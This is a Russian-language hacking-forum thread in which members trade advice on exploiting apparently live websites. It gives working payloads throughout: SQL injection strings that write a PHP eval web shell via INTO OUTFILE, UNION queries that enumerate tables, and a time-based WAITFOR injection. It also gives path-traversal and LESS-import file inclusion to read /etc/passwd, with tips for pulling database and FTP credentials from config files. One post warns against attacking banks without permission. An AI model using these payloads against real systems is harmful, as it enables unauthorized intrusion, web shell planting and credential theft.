Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Что ты .делаешь?
     
    cat1vo likes this.
  2. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    В ошибке явно указано, что нарушен синтаксис. Лучше один раз увидеть, то бишь установить локально MySQL и разобраться в синтаксисе. Или, как минимум, почитать гайды по SQL инъекциям для новичков.
     
    giloo and karkajoi like this.
  3. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    http://www.securityidiots.com/Web-P...XPATH-Error-Based-Injection-Extractvalue.html изучаем, пробуем.
    Сразу надо оговорится, что длина вывода не будет превышать 32 символа вроде. Что б вывести все что 32+ символы(хэш например) надо воспользоватся функцией substring(hash,32)
     
    #2543 karkajoi, 11 Feb 2019
    Last edited: 11 Feb 2019
    m0nkrus and giloo like this.
  4. giloo

    giloo New Member

    Joined:
    2 Feb 2019
    Messages:
    28
    Likes Received:
    3
    Reputations:
    4
    Гайды перечитаны) уже голова трещит от них(
    Спасибо! Но вы дали ссылку на входящий параметр до LIMIT.
    У меня же можно инъектироваться после ORDER BY id LIMIT 0,5 <<ЗДЕСЬ>>
    Если я пробую UNION, то выдает ошибку что ORDER не совместим с UNION((
     
  5. giloo

    giloo New Member

    Joined:
    2 Feb 2019
    Messages:
    28
    Likes Received:
    3
    Reputations:
    4
    Нашла еще способ инъекции:
    SELECT id,name FROM cities ORDER BY id LIMIT 0,5 INTO @var1,@var2
    Но кроме переменных ничего невозможно вставить(
    Так не хочет:

    SELECT id,name FROM cities ORDER BY id LIMIT 0,5 INTO (SELECT 1),@var2
    Есть идеи у кого-нибудь?
     
  6. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    INTO - https://dev.mysql.com/doc/refman/8.0/en/select-into.html
    DoS Bug - https://nvd.nist.gov/vuln/detail/CVE-2015-4870
    Он давно пофиксен, подзапросы больше не работают! Можете вывести только, например, название текущей базы данных, версию и текущего пользователя от которого идет подключение!

    Если у пользователя есть права на запись в фс пробуйте:
    Code:
    ?q=1 into outfile '/path/to/shell.php' lines terminated by "<?php eval($_GET[e]);?>"--+
    
    ?q=1 into outfile '/path/to/shell.php' fields terminated by '' optionally enclosed by "<?php eval($_GET[e]);die();?>"--+
     
    giloo, panic.ker and crlf like this.
  7. giloo

    giloo New Member

    Joined:
    2 Feb 2019
    Messages:
    28
    Likes Received:
    3
    Reputations:
    4
    Спасибо! К несчастью сервер экранирует ковычки. А на строку в виде hex ругается... Значит здесь все? Никак нельзя?(
     
  8. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    char(), aes_decrypt(aes_encrypt())
     
    m0nkrus likes this.
  9. hshad

    hshad New Member

    Joined:
    14 Feb 2019
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    есть инъекция вида
    Code:
    param=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
    как выводить через нее что либо?
    и есть ли возможность подружить с мапом как-то?
     
    #2549 hshad, 14 Feb 2019
    Last edited: 16 Feb 2019
  10. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    есть локальный инклуд позволяющий читать произвольные файлы /style.less?update=e51qf61z&imports[]=../../../../../../../../../../../etc/passwd
    проблема в выводе которая ограничивается 6 строками есть идеи как обойти?
     
  11. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,691
    Likes Received:
    3,145
    Reputations:
    236
    Возможно, ограничение в вывод 6 строк, заложено изначально в серверном приложении, к которому идёт обращение и обработка скрипта.
     
    pinch likes this.
  12. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    файлы с форматом less нормально читаются /style.less?update=e51qf61z&imports[]=/css/main/themes/default.less а вот с другими парсер выдает ошибку
    /* LESS COMPILE ERROR */
    /* ParseError: Unexpected input in robots.txt on line 1, column 10
    1| User-Agent: *
    2|
    3| Disallow: /1
    4| Disallow: /2
    5| Disallow: /3
    6| Disallow: /4 */
     
    altblitz likes this.
  13. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,691
    Likes Received:
    3,145
    Reputations:
    236
    Строку User-agent, сервер желает видеть не *, а вполне браузерного вида:
    Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0, не так ли?
     
  14. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    нет в etc/passwd такая же фигня ParseError: Unexpected input in passwd on line 1, column 15
     
  15. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Ну, 6 строк вывода в ошибке это тоже не плохо. Как вариант, попробуй почитать индексный файл и остальные файлы сайта, очень часто в первых строках идут подключения конфигов и прочих библиотек, возможно прочитав конфиг тебе повезет увидеть в первых 6-ти строках данные для подключения к бд, фтп и тд. (Если конечно эти строки не забитый комментариями разработчиков :D)
     
    pinch and erwerr2321 like this.
  16. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    /proc/self/environ если инклуд а не читалка просто. ну или ававатрку залей с кодом если есть возможность
     
    pinch likes this.
  17. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Не нарушать работу парсера. Если есть возможность как-то закинуть свою нагрузку (пример), можно попробовать так:

    Code:
    /style.less?update=e51qf61z&imports[]=../../../../../../../../../../../tmp/your_cool_file.jpg
    
    Содержимое your_cool_file.jpg:
    Code:
    @import (inline) "/etc/passwd";
    
     
    BillyBons and pinch like this.
  18. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    [​IMG]
    have you?

    This is really bad idea to run SQLi attack on banking if they didn't ask you to do.
     
  19. hibar1Xs

    hibar1Xs Member

    Joined:
    30 Jan 2019
    Messages:
    15
    Likes Received:
    8
    Reputations:
    3
    Не обойти?
    PHP:
    $f stripslashes($_GET['f']);
    if(!(
    strpos($f'..') === false) || strpos('./'$f) != || strpos($f"./") === false)
       { exit(
    'FALSE'); }
    ----------------------------------
    $_GET['f'] = 'wrapper://'
    $w = $_GET['f];
    Возможна ли работа враппера с конкатенацией: './'.$w ?
    readfile('./'.$_GET['f']);
     
    #2559 hibar1Xs, 21 Feb 2019
    Last edited: 22 Feb 2019
  20. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Там все элементарно крутится
    targetname=uIyg' union all select null,database(),null,null-- eqew&status=---
    targetname=uIyg' union all select 1,2,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),4-- eqew&status=---
    и так далее
     
    #2560 karkajoi, 1 Mar 2019
    Last edited: 1 Mar 2019
    erwerr2321 and m0nkrus like this.